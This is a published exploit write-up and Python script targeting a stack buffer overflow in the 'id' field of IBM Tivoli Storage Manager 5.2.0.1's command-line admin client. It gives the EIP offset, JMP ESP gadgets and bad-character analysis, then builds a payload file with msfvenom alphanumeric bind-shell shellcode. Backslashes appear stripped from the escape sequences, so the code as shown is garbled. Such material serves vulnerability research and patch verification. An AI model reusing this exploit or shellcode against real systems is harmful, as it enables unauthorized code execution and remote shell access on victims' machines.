Authored by Paolo Stagno

IBM Tivoli Storage Manager version 5.2.0.1 suffers from a command line administrative interface buffer overflow vulnerability.

# Exploit Title: IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow
# Exploit Author: Paolo Stagno aka VoidSec
# Vendor Homepage: https://www.ibm.com/support/knowledgecenter/en/SSGSG7_7.1.0/com.ibm.itsm.tsm.doc/welcome.html
# Version: 5.2.0.1
# Tested on: Windows 10 Pro v.10.0.19041 Build 19041

"""
Usage: IBM Tivoli Storage Manager > in the "id" field paste the content of "IBM_TSM_v.5.2.0.1_exploit.txt" and press "ENTER"

PS C:UsersuserDesktop> Import-Module .Get-PESecurity.psm1
PS C:UsersuserDesktop> Get-PESecurity -file "dsmadmc.exe"
FileName : dsmadmc.exe
ARCH : I386
DotNET : False
ASLR : True
DEP : True
Authenticode : False
StrongNaming : N/A
SafeSEH : False
ControlFlowGuard : False
HighentropyVA : False
"""

# [ buffer ]
# [ 68 byte | EIP | rest of the buffer ]
# ^_ESP
"""
EIP contains normal pattern : 0x33634132 (offset 68)
ESP (0x0019e314) points at offset 72 in normal pattern (length 3928)

JMP ESP Pointers:
0x028039eb : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x02803d7b : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x02852c21 : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x0289fbe3 : call esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x0289fd2f : call esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x028823a9 : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
"""

#!/usr/bin/python
import struct

# 4000 bytes
buff_max_length=800
eip_offset=68
"""
BAD CHARS: x00x08x09x0ax0dx1ax1bx7f

GOOD CHARS:
asciiprint x20-x7e

MOD CHARS:
x00 -> x20
,-----------------------------------------------.
| Comparison results: |
|-----------------------------------------------|
| 80 81 82 83 84 85 86 87| File
| 3f 3f 2c 9f 2c 2e 2b d8| Memory
80 |88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97| File
|5e 25 53 3c 4f 3f 5a 3f 3f 60 27 22 22 07 2d 2d| Memory
90 |98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7| File
|7e 54 73 3e 6f 3f 7a 59 20 ad 9b 9c 0f 9d dd 15| Memory
a0 |a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7| File
|22 63 a6 ae aa 2d 72 5f f8 f1 fd 33 27 e6 14 fa| Memory
b0 |b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7| File
|2c 31 a7 af ac ab 5f a8 41 41 41 41 8e 8f 92 80| Memory
c0 |c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7| File
|45 90 45 45 49 49 49 49 44 a5 4f 4f 4f 4f 99 78| Memory
d0 |d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7| File
|4f 55 55 55 9a 59 5f e1 85 a0 83 61 84 86 91 87| Memory
e0 |e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7| File
|8a 82 88 89 8d a1 8c 8b 64 a4 95 a2 93 6f 94 f6| Memory
f0 |f8 f9 fa fb fc fd fe ff | File
|6f 97 a3 96 81 79 5f 98 | Memory
`-----------------------------------------------'
"""
# msfvenom -p windows/shell_bind_tcp -f python -v shellcode -a x86 --platform windows -b "x00x08x09x0ax0dx1ax1bx7f" -e x86/alpha_mixed BufferRegister=ESP --smallest
shellcode = b""
shellcode += b"x54x59x49x49x49x49x49x49x49x49x49"
shellcode += b"x49x49x49x49x49x49x49x37x51x5ax6a"
shellcode += b"x41x58x50x30x41x30x41x6bx41x41x51"
shellcode += b"x32x41x42x32x42x42x30x42x42x41x42"
shellcode += b"x58x50x38x41x42x75x4ax49x78x59x78"
shellcode += b"x6bx4dx4bx6bx69x62x54x61x34x6ax54"
shellcode += b"x76x51x6ax72x6cx72x54x37x45x61x4f"
shellcode += b"x39x61x74x4ex6bx62x51x66x50x6cx4b"
shellcode += b"x53x46x34x4cx6cx4bx32x56x35x4cx6e"
shellcode += b"x6bx67x36x37x78x6ex6bx43x4ex51x30"
shellcode += b"x4cx4bx67x46x74x78x50x4fx72x38x42"
shellcode += b"x55x6cx33x30x59x56x61x38x51x39x6f"
shellcode += b"x49x71x73x50x4ex6bx70x6cx31x34x54"
shellcode += b"x64x6ex6bx73x75x67x4cx4ex6bx66x34"
shellcode += b"x46x48x74x38x45x51x69x7ax4cx4bx31"
shellcode += b"x5ax67x68x6ex6bx42x7ax51x30x46x61"
shellcode += b"x6ax4bx68x63x36x54x47x39x6cx4bx35"
shellcode += b"x64x6cx4bx67x71x5ax4ex74x71x6bx4f"
shellcode += b"x64x71x6fx30x59x6cx6cx6cx6fx74x39"
shellcode += b"x50x50x74x43x37x49x51x58x4fx34x4d"
shellcode += b"x77x71x6fx37x5ax4bx6cx34x35x6bx53"
shellcode += b"x4cx35x74x35x78x73x45x48x61x6cx4b"
shellcode += b"x42x7ax75x74x66x61x5ax4bx50x66x4c"
shellcode += b"x4bx46x6cx70x4bx4ex6bx31x4ax77x6c"
shellcode += b"x76x61x68x6bx4ex6bx53x34x6cx4bx53"
shellcode += b"x31x4ax48x4ex69x37x34x56x44x65x4c"
shellcode += b"x70x61x38x43x4fx42x45x58x61x39x38"
shellcode += b"x54x6fx79x48x65x4fx79x59x52x43x58"
shellcode += b"x4cx4ex32x6ex36x6ex7ax4cx72x72x49"
shellcode += b"x78x4fx6fx4bx4fx6bx4fx6bx4fx4ex69"
shellcode += b"x42x65x54x44x6fx4bx73x4ex68x58x4b"
shellcode += b"x52x44x33x6cx47x75x4cx37x54x42x72"
shellcode += b"x4dx38x6ex6ex69x6fx59x6fx49x6fx6d"
shellcode += b"x59x57x35x73x38x70x68x32x4cx52x4c"
shellcode += b"x67x50x71x51x75x38x65x63x76x52x76"
shellcode += b"x4ex42x44x61x78x34x35x54x33x71x75"
shellcode += b"x73x42x70x30x79x4bx6bx38x61x4cx31"
shellcode += b"x34x57x7ax4cx49x59x76x31x46x69x6f"
shellcode += b"x33x65x67x74x4fx79x6ax62x32x70x6d"
shellcode += b"x6bx4dx78x6fx52x42x6dx4fx4cx6fx77"
shellcode += b"x55x4cx75x74x53x62x79x78x61x4fx79"
shellcode += b"x6fx6bx4fx79x6fx30x68x42x4fx62x58"
shellcode += b"x63x68x77x50x73x58x70x61x30x67x33"
shellcode += b"x55x50x42x43x58x32x6dx70x65x61x63"
shellcode += b"x32x53x76x51x69x4bx6dx58x33x6cx51"
shellcode += b"x34x35x5ax4bx39x6bx53x72x48x70x58"
shellcode += b"x47x50x55x70x57x50x42x48x62x50x63"
shellcode += b"x47x70x6ex35x34x34x71x6fx39x4cx48"
shellcode += b"x30x4cx74x64x67x74x6ex69x4bx51x54"
shellcode += b"x71x58x52x62x72x36x33x62x71x71x42"
shellcode += b"x79x6fx68x50x74x71x79x50x76x30x69"
shellcode += b"x6fx50x55x54x48x41x41"

buff = ""
buff += "A" * eip_offset
buff += struct.pack("<I",0x02c73d7b) # 0x02803d7b cause char modification needs to be written as 0x02c73d7b
buff += shellcode
buff += "C" * (buff_max_length - len(buff))

print("Writing {} bytes".format(len(buff)))
f = open("IBM_TSM_v.5.2.0.1_exploit.txt", "w")
f.write(buff)
f.close()